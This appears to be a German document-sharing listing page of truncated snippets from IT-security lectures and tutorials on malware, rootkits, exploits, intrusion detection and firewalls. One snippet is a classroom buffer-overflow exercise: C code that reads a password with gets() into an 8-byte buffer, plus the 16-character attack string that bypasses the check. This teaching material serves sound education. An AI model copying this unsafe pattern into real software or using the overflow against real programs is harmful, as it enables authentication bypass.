MALWARE AM BEISPIEL VON STUXNET MALWARE AM BEISPIEL VON STUXNET IAV10/12 24.05.2011 Jan Heimbrodt Inhalt 1. Definition Was ist Malware? 2. Kategorisierung von Malware Viren, Würmer, Trojaner, 3. Was macht Systeme unsicher? Angriffsziele,

Mehr

Exploits & Rootkits. Betriebssystemdienste & -administration Seminar. Betriebssysteme und Middleware. Sebastian.Roschke@hpi.uni-potsdam.

Exploits & Rootkits. Betriebssystemdienste & -administration Seminar. Betriebssysteme und Middleware. Sebastian.Roschke@hpi.uni-potsdam. Exploits & Rootkits Betriebssystemdienste & -administration Seminar Betriebssysteme und Middleware Sebastian.Roschke@hpi.uni-potsdam.de Steffen.Ryll@hpi.uni-potsdam.de Steffen Ryll & Sebastian Roschke

Mehr

Wilhelm Dolle, Berlin, 22. Oktober 2005. Bedrohung der Systemsicherheit durch Rootkits

Wilhelm Dolle, Berlin, 22. Oktober 2005. Bedrohung der Systemsicherheit durch Rootkits Bedrohung der Systemsicherheit durch Rootkits Wilhelm Dolle, Berlin, 22. Oktober 2005 1 Agenda Was ist ein Rootkit? Klassifizierung und Möglichkeiten von Rootkits Rootkits im Einsatz Rootkits aufspüren

Mehr

Buffer Overflow 1c) Angriffsstring: TTTTTTTTTTTTTTTT (16x) Beachte: Padding GCC-Compiler Zusatz: gcc O2 verhindert hier den Angriff (Code Optimierung)

Buffer Overflow 1c) Angriffsstring: TTTTTTTTTTTTTTTT (16x) Beachte: Padding GCC-Compiler Zusatz: gcc O2 verhindert hier den Angriff (Code Optimierung) Buffer Overflow 1c) 1 char passok='f'; 2 char password[8]; 3 printf( Passwort: ); 4 gets(password); 5 if(!strcmp(password, daspassw )){passok = 'T';} 6 if(passok=='t'){printf( %s, Willkommen! );} 7 else

Mehr

Matthias Hanreich - TheGreyKnight

Matthias Hanreich - TheGreyKnight Matthias Hanreich - TheGreyKnight Grundlagen Code Injection Beispiel: Buffer Overflow Gegenmaßnahmen Code Injection Return Oriented Programming (ROP) Gegenmaßnahmen ROP Demonstration CVE-2012-4969 Hands

Mehr

Sicherheit. Bedeutung Gefahren. Mag. Friedrich Wannerer 1

Sicherheit. Bedeutung Gefahren. Mag. Friedrich Wannerer 1 Sicherheit Bedeutung Gefahren Mag. Friedrich Wannerer 1 Sicherheitsbegriff Unversehrtheit und Vertraulichkeit persönlicher Daten Datenschutzgesetz 2000 Bedrohungen q Dialer, Spam, Spyware, Viren, Würmer,

Mehr

Exploits Wie kann das sein?

Exploits Wie kann das sein? Exploits Durch eine Schwachstelle im Programm xyz kann ein Angreifer Schadcode einschleusen. Manchmal reicht es schon irgendwo im Internet auf ein präpariertes Jpg-Bildchen zu klicken und schon holt man

Mehr

Absicherung von Linux- Rechnern mit grsecurity

Absicherung von Linux- Rechnern mit grsecurity Absicherung von Linux- Rechnern mit grsecurity Brandenburger Linux Infotag, 23. April 2005 Wilhelm Dolle, Director Information Technology interactive Systems GmbH 1 Agenda Grundlagen und Historie von grsecurity

Mehr

Einführung in die Programmiersprache C

Einführung in die Programmiersprache C Einführung in die Programmiersprache C 10 Sicheres Programmieren Alexander Sczyrba Robert Homann Georg Sauthoff Universität Bielefeld, Technische Fakultät Literatur Klein, Buffer Overflows und Format-String-Schwachstellen.

Mehr

Einführung in die Programmiersprache C

Einführung in die Programmiersprache C Einführung in die Programmiersprache C 10 Sicheres Programmieren Alexander Sczyrba Robert Homann Georg Sauthoff Universität Bielefeld, Technische Fakultät Literatur Klein, Buffer Overflows und Format-String-Schwachstellen.

Mehr

99 Backdoors on my UNIX Host Über die Probleme nach einem Sicherheitsvorfall

99 Backdoors on my UNIX Host Über die Probleme nach einem Sicherheitsvorfall State-of-the-art Technology for Worldwide Telecommunications Über die Probleme nach einem Sicherheitsvorfall Andreas Bunten GUUG-Frühjahrsfachgespräch 2012 01.03.2012 I Controlware GmbH I Seite 1 Wie man

Mehr

7.11.2006. int ConcatBuffers(char *buf1, char *buf2, size_t len1, size_t len2) {

7.11.2006. int ConcatBuffers(char *buf1, char *buf2, size_t len1, size_t len2) { Universität Mannheim Lehrstuhl für Praktische Informatik 1 Prof. Dr. Felix C. Freiling Dipl.-Inform. Martin Mink Dipl.-Inform. Thorsten Holz Vorlesung Angewandte IT-Sicherheit Herbstsemester 2006 Übung

Mehr

Intrusion Detection & Intrusion Prevention. Tobias Marx Gastvorlesung Sicherheit in Netzen 14. April 2005

Intrusion Detection & Intrusion Prevention. Tobias Marx Gastvorlesung Sicherheit in Netzen 14. April 2005 Intrusion Detection & Intrusion Prevention Tobias Marx Gastvorlesung Sicherheit in Netzen 14. April 2005 Inhalt Begriffsdefinitionen Aufgaben eines Intrusion Detection Systems Architektur eines Intrusion

Mehr

Beispiel 2a Die eigenen ersten Schritte mit dem Gnu-Debugger GDB für Remote-Debugging

Beispiel 2a Die eigenen ersten Schritte mit dem Gnu-Debugger GDB für Remote-Debugging Beispiel 2a Die eigenen ersten Schritte mit dem Gnu-Debugger GDB für Remote-Debugging Das Beispiel orientiert sich am selben Code, der im Teil 1 der Serie verwendet wurde. Text Styles: Shell Prompt mit

Mehr

Überblick. Vorlesung Informationssicherheit. Logische Bomben. Ausschnitt aus dem McAfee-Aktivierungskalender. Hintertüren (Back Doors) Logische Bomben

Überblick. Vorlesung Informationssicherheit. Logische Bomben. Ausschnitt aus dem McAfee-Aktivierungskalender. Hintertüren (Back Doors) Logische Bomben Überblick Bösartige Software Vorlesung Informationssicherheit Thema 5: Bösartige Software Wirtsprogramm nötig unabhängig Robert Baumgartl 7. 5. 2 Hintertüren Logische Bomben Viren Würmer Trojanische Pferde

Mehr

Effizienz im Vor-Ort-Service

Effizienz im Vor-Ort-Service Installation: Anleitung SatWork Integrierte Auftragsabwicklung & -Disposition Februar 2012 Disposition & Auftragsabwicklung Effizienz im Vor-Ort-Service Disclaimer Vertraulichkeit Der Inhalt dieses Dokuments

Mehr

Reverse Cloud. Michael Weisgerber. Channel Systems Engineer DACH September 2013

Reverse Cloud. Michael Weisgerber. Channel Systems Engineer DACH September 2013 Reverse Cloud Michael Weisgerber Channel Systems Engineer DACH September 2013 Öffentliche Wahrnehmung - heute Flame Duqu Stuxnet Page 2 2011 Palo Alto Networks. Proprietary and Confidential. Öffentliche

Mehr

Mac Firewall etc. Mark Heisterkamp heisterkamp@rrzn.uni-hannover.de. 10. August 2009. Mark Heisterkamp, Mac Firewall etc., 10. August 2009 Seite 1/25

Mac Firewall etc. Mark Heisterkamp heisterkamp@rrzn.uni-hannover.de. 10. August 2009. Mark Heisterkamp, Mac Firewall etc., 10. August 2009 Seite 1/25 Mac Firewall etc. Mark Heisterkamp heisterkamp@rrzn.uni-hannover.de 10. August 2009 Mark Heisterkamp, Mac Firewall etc., 10. August 2009 Seite 1/25 Leopard Seit Mac OS X 10.5 zwei Firewalls: Applikationsspezifisch

Mehr

Sinn und Unsinn von Desktop-Firewalls

Sinn und Unsinn von Desktop-Firewalls CLT 2005 Sinn und Unsinn von Desktop-Firewalls Wilhelm Dolle, Director Information Technology interactive Systems GmbH 5. und 6. März 2005 1 Agenda Was ist eine (Desktop-)Firewall? Netzwerk Grundlagen

Mehr

PS Kryptographie und IT-Sicherheit. Thema: Software-Sicherheit. Thomas Loch, Michael Streif 2012

PS Kryptographie und IT-Sicherheit. Thema: Software-Sicherheit. Thomas Loch, Michael Streif 2012 PS Kryptographie und IT-Sicherheit Thema: Software-Sicherheit Thomas Loch, Michael Streif 2012 Malicious / Invalid Input Exploits nutzen Nebeneffekte von ungültigen Benutzereingaben aus, die vom Programmierer

Mehr

Port-Knocking. Referat im Fach Datenschutz / -sicherheit von Stefan Macke. http://www.stefan. www.stefan-macke.com

Port-Knocking. Referat im Fach Datenschutz / -sicherheit von Stefan Macke. http://www.stefan. www.stefan-macke.com Port-Knocking Referat im Fach Datenschutz / -sicherheit von Stefan Macke http://www.stefan www.stefan-macke.com 1 Agenda des Port-Knockings knockd webknocking durch Port-Knocking? 2 2 Was ist Port-Knocking?

Mehr

Sicherheit in Software

Sicherheit in Software Sicherheit in Software Fabian Cordt und Friedrich Eder 3. Juni 2011 Allgemeines Begriffserklärung Woher Die 19 Todsünden 1 - Teil 2 - Teil 3 - Teil Was kann passieren Probleme beim Porgramm Durch Lücken

Mehr

Mac OS X Consoliero: Terminal Solutions Version 1.0

Mac OS X Consoliero: Terminal Solutions Version 1.0 Mac OSX Consoliero Terminal Solution Seite: 1/11 Mac OS X Consoliero Weiterführende Dokumentationen für Administratoren. Mac OS X Consoliero: Terminal Solutions Version 1.0 Christoph Müller, PTS Mac OSX

Mehr

W. Diffie: Information security: 50 years behind, 50 years ahead Comm. of the ACM, January 2008, p. 55

W. Diffie: Information security: 50 years behind, 50 years ahead Comm. of the ACM, January 2008, p. 55 Artikel der Woche: W. Diffie: Information security: 50 years behind, 50 years ahead Comm. of the ACM, January 2008, p. 55 (Google: destroyed locality in computing ) ITS-9.1 1 9 Einbruchssicherung Einbruchstechniken

Mehr

Linux Intrusion Detection System (LIDS, www.lids.org)

Linux Intrusion Detection System (LIDS, www.lids.org) Linux Intrusion Detection System (LIDS, www.lids.org) oder: wie mache ich mein System sicher... und mir das Leben schwer :-) Michael Würtz TU Darmstadt, HRZ 10/2003 Inhalt 1. Intrusion Detection in Kurzform

Mehr

Rootkits: Techniken und Abwehr

Rootkits: Techniken und Abwehr Rootkits: Techniken und Abwehr Von Rootkits eingesetzte Techniken und Methoden zur ihrer Entdeckung und Abwehr DFN Workshop 2003, 26. Februar 2003 Dipl. Inf. Andreas Bunten Gliederung Was sind Rootkits?

Mehr

Internet & Sicherheit

Internet & Sicherheit Internet & Sicherheit Klaus-Peter Hahn Mac Club Aschaffenburg Termin: 9. Januar 2003 Einführung Daten / Datenpakete Datenübertragung Paketorientierte Datenübertragung Serielle Datenströme (synchron) IP-Adressen

Mehr

Intrusion Prevention mit IPTables. Secure Linux Administration Conference, 6. / 7. Dec 2007. Dr. Michael Schwartzkopff. iptables_recent, SLAC 2007 / 1

Intrusion Prevention mit IPTables. Secure Linux Administration Conference, 6. / 7. Dec 2007. Dr. Michael Schwartzkopff. iptables_recent, SLAC 2007 / 1 Intrusion Prevention mit IPTables Secure Linux Administration Conference, 6. / 7. Dec 2007 Dr. Michael Schwartzkopff iptables_recent, SLAC 2007 / 1 Übersicht Grundlagen Linux Firewalls: iptables Das recent

Mehr

System- und Netzwerkmanagement

System- und Netzwerkmanagement System- und Netzwerkmanagement Protokollierung mit Syslog-NG Markus Müller (11043150) Sven Nissel (11042398) Roman Pyro (11042289) Christian Fehmer (11042419) Versuchsaufbau - Übersicht Syslog Konfiguration

Mehr

Übungen zur Vorlesung Systemsicherheit

Übungen zur Vorlesung Systemsicherheit Übungen zur Vorlesung Systemsicherheit Address Space Layout Randomization Tilo Müller, Reinhard Tartler, Michael Gernoth Lehrstuhl Informatik 1 + 4 19. Januar 2011 c (Lehrstuhl Informatik 1 + 4) Übungen

Mehr

Thomas Bechtold Peer Heinlein. Snort, Acid 8t Co. Einbruchserkennung mit Linux

Thomas Bechtold Peer Heinlein. Snort, Acid 8t Co. Einbruchserkennung mit Linux Thomas Bechtold Peer Heinlein Snort, Acid 8t Co. Einbruchserkennung mit Linux Grundlagen der Einbruchserkennung 13 Warum und wie funktionieren Angriffe? 15 1.1 Wann ist ein Angriff ein Angriff? 16 1.2

Mehr

Mac OS X Firewall. Mark Heisterkamp heisterkamp@rrzn.uni-hannover.de. 21. November 2011. Zentrale Services Informationstechnologie

Mac OS X Firewall. Mark Heisterkamp heisterkamp@rrzn.uni-hannover.de. 21. November 2011. Zentrale Services Informationstechnologie Mac OS X Firewall Mark Heisterkamp heisterkamp@rrzn.uni-hannover.de 21. November 2011 Mark Heisterkamp, Mac OS X Firewall, 21. November 2011 Seite 1/20 Lion Seit Mac OS X 10.7 drei Firewalls: Applikationsspezifisch

Mehr

Konfiguration einer Firewall mit FireHOL

Konfiguration einer Firewall mit FireHOL Dokumentation Konfiguration einer Firewall mit FireHOL Inhalt: 1. Installation von FireHOL 2. Netzübersicht 3. Konfigurationsoptionen 4. Anpassen der FireHOL Konfiguration 5. FireHOL-Optionen 6. Überprüfen

Mehr

protokolliert alle Anmeldungen am Server direkt

protokolliert alle Anmeldungen am Server direkt Logdateien in der paedml 1 Überblick 1.1 Systemrelevante Logdateien unter Linux Systemrelevante Log Dateien liegen weitgehend in /var/log bzw. einem Unterverzeichnis, das mit dem Namen des Dienstes benannt

Mehr

Definition (BSI) Intrusion Detection Systeme. Alternative Definition. Hauptkomponenten. Erkennung von Angriffen. Hauptkomponenten

Definition (BSI) Intrusion Detection Systeme. Alternative Definition. Hauptkomponenten. Erkennung von Angriffen. Hauptkomponenten Definition (BSI) Intrusion Detection Systeme IDS Aktive Überwachung von Systemen und Netzen mit dem Ziel der Erkennung von Angriffen und Missbrauch. Aus allen im Überwachungsbereich stattfindenen Ereignissen

Mehr

MySQL Queries on "Nmap Results"

MySQL Queries on Nmap Results MySQL Queries on "Nmap Results" SQL Abfragen auf Nmap Ergebnisse Ivan Bütler 31. August 2009 Wer den Portscanner "NMAP" häufig benutzt weiss, dass die Auswertung von grossen Scans mit vielen C- oder sogar

Mehr

Hacking. InfoPoint 07.12.2005. Jörg Wüthrich

Hacking. InfoPoint 07.12.2005. Jörg Wüthrich Hacking InfoPoint 07.12.2005 Jörg Wüthrich Inhalte Rund um das Thema Hacking Angriffs-Techniken Session Handling Cross Site Scripting (XSS) SQL-Injection Buffer Overflow 07.12.2005 Infopoint - Hacking

Mehr

Switching. Übung 2 System Management. 2.1 Szenario

Switching. Übung 2 System Management. 2.1 Szenario Übung 2 System Management 2.1 Szenario In der folgenden Übung werden Sie Ihre Konfiguration sichern, löschen und wieder herstellen. Den Switch werden Sie auf die neueste Firmware updaten und die Funktion

Mehr

Firewall Implementierung unter Mac OS X

Firewall Implementierung unter Mac OS X Firewall Implementierung unter Mac OS X Mac OS X- Firewall: Allgemeines * 2 Firewall- Typen: * ipfw * programmorientierte Firewall * 3 Konfigurations- Möglichkeiten * Systemeinstellungen * Dritthersteller-

Mehr

Organisatorisches. Übungsleiter: Karsten Otto (otto@inf.fu-berlin.de) Homepage: http://www.inf.fu-berlin.de/lehre/ss06/netzsicherheit Aufgaben

Organisatorisches. Übungsleiter: Karsten Otto (otto@inf.fu-berlin.de) Homepage: http://www.inf.fu-berlin.de/lehre/ss06/netzsicherheit Aufgaben Organisatorisches Übungsleiter: Karsten Otto (otto@inf.fu-berlin.de) Homepage: http://www.inf.fu-berlin.de/lehre/ss06/netzsicherheit Aufgaben Mittwochs im Netz Vorbesprechung Freitag/Montag in der Übung

Mehr

Digitale Forensik. Teil 6: Ablauf von Angriffen. Schulung Bundespolizeiakademie März 2009

Digitale Forensik. Teil 6: Ablauf von Angriffen. Schulung Bundespolizeiakademie März 2009 Digitale Forensik Schulung Bundespolizeiakademie März 2009 Teil 6: Ablauf von Angriffen Dipl. Inform. Markus Engelberth Dipl. Inform. Christian Gorecki Universität Mannheim Lehrstuhl für Praktische Informatik

Mehr

Intrusion Detection Basics

Intrusion Detection Basics Intrusion Detection Basics Ziele von Angriffen Formen von Angriffen Vorgehensweise von Eindringlingen Überwachungsmöglichkeiten Tools: tripwire, iptraf, tcpdump, snort Ziele von Angriffen (Auswahl) Sport:

Mehr

Webapplikations-Sicherheit: Erfahrungen aus der Praxis. Stefan Hölzner, Jan Kästle 26.01.2010

Webapplikations-Sicherheit: Erfahrungen aus der Praxis. Stefan Hölzner, Jan Kästle 26.01.2010 Webapplikations-Sicherheit: Erfahrungen aus der Praxis Stefan Hölzner, Jan Kästle 26.01.2010 Agenda Schwachstellen: die Ursachen Angriffstechniken aus der Praxis root-access in 20 Schritten 2 Schwachstellen:

Mehr

Scan-Techniken Ein Überblick

Scan-Techniken Ein Überblick Scan-Techniken Ein Überblick Klaus Möller DFN-CERT GmbH Februar 2002 Agenda Was sind Scans? Scan-Techniken ICMP Scans TCP Scans UDP Scans Weitere Scan-Techniken Umgang mit Scans Was sind Scans? Einbruchszyklus:

Mehr

Einsatz des flypaper-dämons zur effektiven Abwehr von Portscan-Angriffen

Einsatz des flypaper-dämons zur effektiven Abwehr von Portscan-Angriffen Einsatz des flypaper-dämons zur effektiven Abwehr von Portscan-Angriffen Johannes Franken Abbildung: Klebefalle (engl.: flypaper) Auf dieser Seite beschreibe ich, wie man Linux-Firewalls

Mehr

bacula The Network Backup Solution

bacula The Network Backup Solution bacula The Network Backup Solution Betriebssysteme Client Server Linux X X FreeBSD X X OpenBSD X NetBSD X X Mac OS X X Windows X manchmal IRIX X Konzept Director Datenbank File Daemon Meta- Daten Storage

Mehr

Praktikum IT-Sicherheit

Praktikum IT-Sicherheit IT-Sicherheit Praktikum IT-Sicherheit - Versuchshandbuch - Aufgaben Trojaner Als Trojaner wird eine Art von Malware bezeichnet, bei der es sich um scheinbar nützliche Software handelt, die aber neben ihrer

Mehr

Infrusion Defection System Evasion durch Angriffsverschleierung in Exploiting Frameworks

Infrusion Defection System Evasion durch Angriffsverschleierung in Exploiting Frameworks Thomas Stein Infrusion Defection System Evasion durch Angriffsverschleierung in Exploiting Frameworks Diplomica Verlag GmbH Inhaltsverzeichnis Abbildungsverzeichnis 7 Tabellenverzeichnis 9 Listingverzeichnis

Mehr

Cross-View based Rootkit Detection

Cross-View based Rootkit Detection Cross-View based Rootkit Detection Neue Wege in der digitalen Forensik Wilhelm Dolle Director Information Technology interactive Systems GmbH Competence Center For Applied Security Technology (CAST) -

Mehr

Advanced Exploiting. tk, tk@trapkit.de IT-DEFENSE 2005

Advanced Exploiting. tk, tk@trapkit.de IT-DEFENSE 2005 Advanced Exploiting tk, tk@trapkit.de IT-DEFENSE 2005 Stand der Dinge Schutzmechanismen werden ausgereifter (Netz/Host) Trend zu mehr Komplexität ( ( CP AI/WI, Parser, ) Logische Konsequenzen für Angreifer:

Mehr

Advanced Persistent Threat

Advanced Persistent Threat Advanced Persistent Threat Ivan Bütler Compass Security AG, Schweiz Ivan.buetler@csnc.ch Compass Security AG Glärnischstrasse 7 Postfach 1628 CH-8640 Rapperswil Tel.+41 55-214 41 60 Fax+41 55-214 41 61

Mehr

Secure Linux Praxis. ein How-To Vortrag am 11.05.2006. Christoph Weinandt Systemadministrator / Security Officer ComBOTS AG, Karlsruhe

Secure Linux Praxis. ein How-To Vortrag am 11.05.2006. Christoph Weinandt Systemadministrator / Security Officer ComBOTS AG, Karlsruhe Secure Linux Praxis ein How-To Vortrag am 11.05.2006 Christoph Weinandt Systemadministrator / Security Officer ComBOTS AG, Karlsruhe Workshop Agenda "IT-Sicherheit" - Grundlagen - Gefährdungen Linux Absicherung

Mehr

HoneypotMe Flexible Auslagerung von Honeypot-Sensorik auf gefährdete Endgeräte

HoneypotMe Flexible Auslagerung von Honeypot-Sensorik auf gefährdete Endgeräte Flexible Auslagerung von Honeypot-Sensorik auf gefährdete Endgeräte Jan Gassen jan.gassen@fkie.fraunhofer.de 21.02.2012 Forschungsgruppe Cyber Defense Erkennung von Malware Unterschiedliche Verbreitung

Mehr

Objektorientiertes Programmieren für Ingenieure

Objektorientiertes Programmieren für Ingenieure Uwe Probst Objektorientiertes Programmieren für Ingenieure Anwendungen und Beispiele in C++ 18 2 Von C zu C++ 2.2.2 Referenzen und Funktionen Referenzen als Funktionsparameter Liefert eine Funktion einen

Mehr

Remote Tools. SFTP Port X11. Proxy SSH SCP. christina.zeeh@studi.informatik.uni-stuttgart.de

Remote Tools. SFTP Port X11. Proxy SSH SCP. christina.zeeh@studi.informatik.uni-stuttgart.de Remote Tools SSH SCP Proxy SFTP Port X11 christina.zeeh@studi.informatik.uni-stuttgart.de Grundlagen SSH Inhalt Remote-Login auf marvin Datentransfer Graphische Anwendungen Tunnel VPN SSH für Fortgeschrittene

Mehr

German Metasploit Framework Tutorial 16. August 2005 dav

German Metasploit Framework Tutorial 16. August 2005 dav German Metasploit Framework Tutorial 16. August 2005 dav Inhalt 1. Einleitung 2. Exploit Datenbank 2.1. Neue Exploits integrieren 3. Payload Datenbank 4. Konfiguration und Anwendungen eines Exploits 4.1.

Mehr

Datenschutz. Schutz von Personen und Unternehmungen vor dem Missbrauch ihrer Daten. organisatorische Datenschutzmassnahmen

Datenschutz. Schutz von Personen und Unternehmungen vor dem Missbrauch ihrer Daten. organisatorische Datenschutzmassnahmen Datenschutz Schutz von Personen und Unternehmungen vor dem Missbrauch ihrer Daten. organisatorische Datenschutzmassnahmen gesetzliche Datenschutzmassnahmen www.datenschutz.ch K4.4 Datensicherheit - Datenschutz

Mehr

Lehrstuhl für Datenverarbeitung. Technische Universität München. Grundkurs C++ Dokumentation mit Doxygen

Lehrstuhl für Datenverarbeitung. Technische Universität München. Grundkurs C++ Dokumentation mit Doxygen Grundkurs C++ Dokumentation mit Doxygen Doxygen Überblick Grundkurs C++ 2 Doxygen doxygen g Erzeugt Doxyfile Konfigurationsdatei Kann mit Texteditor bearbeitet werden. doxygen Doxyfile Erzeugt Dokumentation

Mehr

Wartungsfreie Logsicherung mittels ontape

Wartungsfreie Logsicherung mittels ontape Wartungsfreie Logsicherung mittels ontape Edgar Riegger, IBM Deutschland GmbH August 2008 Getreu dem Motto: Cheetah - Expanding the Administration Free Zone wird im IBM Informix Dynamic Server (IDS) seit

Mehr

check_multi Matthias Flacke Nagios Workshop 26. Juni 2007

check_multi Matthias Flacke Nagios Workshop 26. Juni 2007 check_multi Matthias Flacke Nagios Workshop 26. Juni 2007 Was ist check_multi? check_multi ist ein Wrapper-Plugin (Parent), das andere Plugins (Childs) aufruft. In einer Headerzeile wird eine Zusammenfassung

Mehr

HÄRTUNG VON WEB-APPLIKATIONEN MIT OPEN-SOURCE-SOFTWARE. Münchener Open-Source-Treffen, Florian Maier, 23.05.2014

HÄRTUNG VON WEB-APPLIKATIONEN MIT OPEN-SOURCE-SOFTWARE. Münchener Open-Source-Treffen, Florian Maier, 23.05.2014 HÄRTUNG VON WEB-APPLIKATIONEN MIT OPEN-SOURCE-SOFTWARE Münchener Open-Source-Treffen, Florian Maier, 23.05.2014 ÜBER MICH 34 Jahre, verheiratet Open Source Enthusiast seit 1997 Beruflich seit 2001 Sicherheit,

Mehr

GCC 3.x Stack Layout. Auswirkungen auf Stack-basierte Exploit-Techniken. Tobias Klein, 2003 tk@trapkit.de Version 1.0

GCC 3.x Stack Layout. Auswirkungen auf Stack-basierte Exploit-Techniken. Tobias Klein, 2003 tk@trapkit.de Version 1.0 1 GCC 3.x Stack Layout Auswirkungen auf Stack-basierte Exploit-Techniken Tobias Klein, 2003 tk@trapkit.de Version 1.0 2 Abstract Eine spezielle Eigenschaft des GNU C Compilers (GCC) der Version 3.x wirkt

Mehr

Smartphone Entwicklung mit Android und Java

Smartphone Entwicklung mit Android und Java Smartphone Entwicklung mit Android und Java predic8 GmbH Moltkestr. 40 53173 Bonn Tel: (0228)5552576-0 www.predic8.de info@predic8.de Was ist Android Offene Plattform für mobile Geräte Software Kompletter

Mehr

GUUG FFG 2005. Aufbau einer zentralen Log-Infrastruktur mit syslog-ng. Jens Link jenslink@quux.de

GUUG FFG 2005. Aufbau einer zentralen Log-Infrastruktur mit syslog-ng. Jens Link jenslink@quux.de GUUG FFG 2005 Aufbau einer zentralen Log-Infrastruktur mit syslog-ng Jens Link jenslink@quux.de 1 Übersicht Motivation / Aufbau des Netzes syslog Protokoll syslog/syslog-ng Konfiguration der Server Konfiguration

Mehr

vii Inhalt 0x100 Einführung 1 0x200 Programmierung 7

vii Inhalt 0x100 Einführung 1 0x200 Programmierung 7 vii 0x100 Einführung 1 0x200 Programmierung 7 0x210 Was ist Programmierung?..................................... 8 0x220 Pseudocode................................................ 9 0x230 Kontrollstrukturen.........................................

Mehr

Betriebssysteme KU - Einführungstutorium

Betriebssysteme KU - Einführungstutorium Betriebssysteme KU - Einführungstutorium SWEB-Tutoren irc://irc.at.euirc.net/bs Teamwork Arbeitsaufteilung? Zeiteinteilung? Codeeinteilung? Kommunikation! Kommunikation Kommunikation mit dem Team Gruppentreffen

Mehr

Open Source und Sicherheit

Open Source und Sicherheit Open Source und Sicherheit Jochen Bauer Inside Security IT Consulting GmbH Nobelstraße 15 70569 Stuttgart info@inside-security.de Open Source und Sicherheit 1 Passive und aktive Sicherheit oder: Sicherheit

Mehr

Towards Dynamic Attack Recognition for SIEM. Stefan Langeder

Towards Dynamic Attack Recognition for SIEM. Stefan Langeder Towards Dynamic Attack Recognition for SIEM Stefan Langeder Stefan Langeder 2009-2012: IT Security FH St. Pölten 2012-2014: Information Security FH St. Pölten Seit 2013: Security Consultant ANLX Überblick

Mehr

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung 6. Zone Defense 6.1 Einleitung Im Folgenden wird die Konfiguration von Zone Defense gezeigt. Sie verwenden einen Rechner für die Administration, den anderen für Ihre Tests. In der Firewall können Sie entweder

Mehr

Wo ist mein Geld? Identitätsmissbrauch im Online-Banking. Christoph Sorge Universität des Saarlandes juris-stiftungsprofessur für Rechtsinformatik

Wo ist mein Geld? Identitätsmissbrauch im Online-Banking. Christoph Sorge Universität des Saarlandes juris-stiftungsprofessur für Rechtsinformatik Wo ist mein Geld? Identitätsmissbrauch im Online-Banking Christoph Sorge Universität des Saarlandes juris-stiftungsprofessur für Rechtsinformatik C. Sorge 2 Überblick Rechner des Kunden Server der Bank

Mehr

Hacking Linux Proseminar Network Hacking und Abwehr

Hacking Linux Proseminar Network Hacking und Abwehr Lehrstuhl Netzarchitekturen und Netzdienste Institut für Informatik Technische Universität München Hacking Linux Proseminar Network Hacking und Abwehr Vortragender: Marek Kubica Betreuer: Holger Kinkelin

Mehr

Network Intrusion Detection mit Snort. (Nachtrag zu 9.2.2, Seite 33)

Network Intrusion Detection mit Snort. (Nachtrag zu 9.2.2, Seite 33) Network Intrusion Detection mit Snort (Nachtrag zu 9.2.2, Seite 33) www.snort.org www.snort.org/docs/snort_htmanuals/htmanual_280/ ITS-9.2.snort 1 snort ist das Standard-Werkzeug für ID, vielseitig einsetzbar

Mehr

Im Folgenden wird die Konfiguration der DIME Tools erläutert. Dazu zählen die Dienste TFTP Server, Time Server, Syslog Daemon und BootP Server.

Im Folgenden wird die Konfiguration der DIME Tools erläutert. Dazu zählen die Dienste TFTP Server, Time Server, Syslog Daemon und BootP Server. 1. DIME Tools 1.1 Einleitung Im Folgenden wird die Konfiguration der DIME Tools erläutert. Dazu zählen die Dienste TFTP Server, Time Server, Syslog Daemon und BootP Server. 1.2 Voraussetzungen Folgende

Mehr

FAQ Häufig gestellte Fragen

FAQ Häufig gestellte Fragen FAQ Häufig gestellte Fragen FAQ zu HitmanPro.Kickstart Seite 1 Inhaltsverzeichnis Einführung in HitmanPro.Kickstart... 3 F-00: Wozu wird HitmanPro.Kickstart benötigt?... 4 F-01: Kann HitmanPro.Kickstart

Mehr

Avira Professional / Server Security. Date

Avira Professional / Server Security. Date Date Agenda Wozu benötige ich einen Virenschutz für Workstations/Server? Systemanforderungen der Avira Professional Security Was bietet die Avira Professional Security? Systemanforderungen der Avira Professional

Mehr

Linux basierendes NAS auf Seagate Goflex Net installieren. Christian Eppler 21162, Stefan Möbius 21165

Linux basierendes NAS auf Seagate Goflex Net installieren. Christian Eppler 21162, Stefan Möbius 21165 Linux basierendes NAS auf Seagate Goflex Net installieren Christian Eppler 21162, Stefan Möbius 21165 Inhaltsverzeichnis Wieso das Ganze? Nachteile Pogoplug/Debian Vorteile Pogoplug/Debian Wieso diese

Mehr

docker.io Secure And Portable Containers Made Easy Jürgen Brunk München, 30.04.2014

docker.io Secure And Portable Containers Made Easy Jürgen Brunk München, 30.04.2014 Secure And Portable Containers Made Easy Jürgen Brunk München, 30.04.2014 Agenda 1. Was ist Docker? 2. Was sind Container? 3. Warum Docker? 4. Architektur 5. Praxis 6. Docker unter Ubuntu installieren

Mehr

KeePass. 19.01.2010 10:15-10:45 Uhr. Birgit Gersbeck-Schierholz, IT-Sicherheit, RRZN

KeePass. 19.01.2010 10:15-10:45 Uhr. Birgit Gersbeck-Schierholz, IT-Sicherheit, RRZN KeePass the free, open source, light-weight and easy-to-use password manager 19.01.2010 10:15-10:45 Uhr Birgit Gersbeck-Schierholz, IT-Sicherheit, RRZN Agenda Einführung Versionen Features Handhabung Mobile

Mehr

Digitale Identität. Candid Wüest Threat Researcher Symantec Switzerland

Digitale Identität. Candid Wüest Threat Researcher Symantec Switzerland Candid Wüest Threat Researcher Symantec Switzerland Agenda 1 Welche Informationen gibt es online 2 Wie kommen die Daten abhanden 3 Was wird mit den Daten angestellt 4 Q & A Candid Wüest 2 Was gehört dazu?

Mehr

Hausarbeit. Thema: Computersicherheit. Friedrich-Schiller-Universität Jena Informatik B.Sc. Wintersemester 2009 / 2010

Hausarbeit. Thema: Computersicherheit. Friedrich-Schiller-Universität Jena Informatik B.Sc. Wintersemester 2009 / 2010 1 Friedrich-Schiller-Universität Jena Informatik B.Sc. Wintersemester 2009 / 2010 Hausarbeit Thema: Computersicherheit Seminar: Datenschutz und Datenpannen Verfasser: Dmitrij Miller Abgabetermin: 5.3.2010

Mehr

Ein Ersatz für NRPE und NSCA?

Ein Ersatz für NRPE und NSCA? ? Sven Velt team(ix) GmbH, Nürnberg sv@teamix.net Sven Velt Über mich Linux seit»10 Jahren 1995-2001 Internet-Provider Verantwortlich für Technik 24/7 muss alles laufen Monitoring notwendig... mehr als

Mehr

Programmieren unter LINUX Eine Einführung

